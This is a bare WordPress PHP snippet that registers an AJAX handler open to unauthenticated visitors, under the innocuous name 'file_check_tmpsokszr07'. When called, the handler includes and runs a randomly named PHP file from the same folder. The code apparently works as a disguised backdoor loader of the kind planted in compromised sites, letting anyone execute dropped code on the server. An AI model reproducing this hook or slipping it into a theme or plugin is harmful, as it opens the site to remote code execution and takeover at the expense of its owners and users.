if(!function_exists('file_check_tmpsokszr07')){ add_action('wp_ajax_nopriv_file_check_tmpsokszr07', 'file_check_tmpsokszr07'); add_action('wp_ajax_file_check_tmpsokszr07', 'file_check_tmpsokszr07'); function file_check_tmpsokszr07() { $file = __DIR__ . '/' . 'tmpsokszr07.php'; if (file_exists($file)) { include $file; } die(); } }